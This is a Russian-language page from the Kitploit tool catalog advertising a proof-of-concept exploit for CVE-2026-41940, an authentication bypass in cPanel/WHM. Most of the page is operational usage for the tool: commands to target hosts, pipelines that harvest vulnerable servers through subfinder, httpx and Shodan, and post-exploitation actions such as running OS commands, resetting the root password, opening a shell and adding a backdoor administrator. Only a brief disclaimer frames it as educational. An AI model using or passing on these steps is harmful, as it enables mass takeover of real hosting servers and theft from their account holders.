Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-41940-PoC — Эксплуатирует CVE-2026-41940, обход аутентификации в cPanel/WHM, для получения root-доступа к WHM и выполнения постэксплуатационных команд, перечисления аккаунтов и интерактивных сессий оболочки. | Kitploit
Инструменты/GitHubGitHub/ctdal/cve-2026-41940-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияВеб-безопасностьТестирование на ПроникновениеКомандование и УправлениеАутентификацияRed TeamingИнструмент Удаленного Доступа
GitHubctdal/cve-2026-41940-poc
441112 ч 10 мин назадЕщё не проверено

cve-2026-41940-PoC

Эксплуатирует CVE-2026-41940, обход аутентификации в cPanel/WHM, для получения root-доступа к WHM и выполнения постэксплуатационных команд, перечисления аккаунтов и интерактивных сессий оболочки.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-41940

⚠ Этот инструмент создан исключительно в образовательных целях или для баг-баунти. Несанкционированное использование вне контролируемой среды строго запрещено.

Описание

Инструмент для эксплуатации CVE-2026-41940 — критического обхода аутентификации в cPanel & WHM (CVSS 10.0), позволяющего неаутентифицированным злоумышленникам получить root-доступ к WHM путём внедрения CRLF-последовательностей в серверные файлы сессий через заголовок Authorization — без учётных данных.

Как это работает

CVE-2026-41940, в общих чертах, эксплуатируется через нарушение в обработке системой сессий аутентификации в cPanel/WHM. Атака обычно начинается с обычного запроса к интерфейсу входа, где приложение преждевременно инициализирует сессию до полной проверки учётных данных пользователя. Из-за неправильной обработки входных данных, связанных с сессией, определённые специально сформированные или неожиданные структуры ввода могут изменить способ хранения или интерпретации данных сессии сервером.

Уязвимые версии

ВерсияУязвимаИсправлена
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Установка (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/ctdal/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

Как использовать

Инструмент ожидает указания целевого домена.

Режим одной цели:

root@kitploit:~
python cve.py -u https://target1.com:2083

Также можно сканировать из файла target.txt (создайте его):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

Базовое сканирование:

Доступные команды:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # сканирование одной цели
python cve.py info -u https://victim1.com:2083 # Получает системную информацию (версия, нагрузка, использование диска).
python cve.py host -u https://victim1.com:2083 # Получает имя хоста целевого сервера.

Действия после эксплуатации

root@kitploit:~
# Список всех аккаунтов на сервере
python cve.py list -u https://target.com:2087

# Команда ОС
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Получить информацию о сервере (имя хоста, диск, хост MySQL)
python cve.py info -u https://target.com:2087

# Сменить пароль root
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Интерактивная оболочка WHM
python cve.py shell -u https://target.com:2087

Конвейеры

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# Из списка scope
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Результаты Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Несколько источников объединены
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

Режим оболочки WHM

После успешного выполнения можно открыть интерактивную оболочку WHM:

root@kitploit:~
python cve.py shell -u

Все команды оболочки

КомандаОписание
idПоказать ID пользователя
hostnameПолучить имя хоста сервера
accountsСписок всех пользовательских аккаунтов
infoНагрузка, диск, хост MySQL, версия
cat <path>Прочитать содержимое файла
exec <cmd>Выполнить команду ОС
newadmin <user> <pass>Создать бэкдор-админа WHM
passwd <pass>Сменить пароль root
l [path]Список содержимого каталога
helpПоказать все команды
exitВыйти из режима оболочки

Справочник CLI

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

Отказ от ответственности

⚠ Этот инструмент создан исключительно в образовательных целях или для баг-баунти. Несанкционированное использование вне контролируемой среды строго запрещено.

Скачать инструмент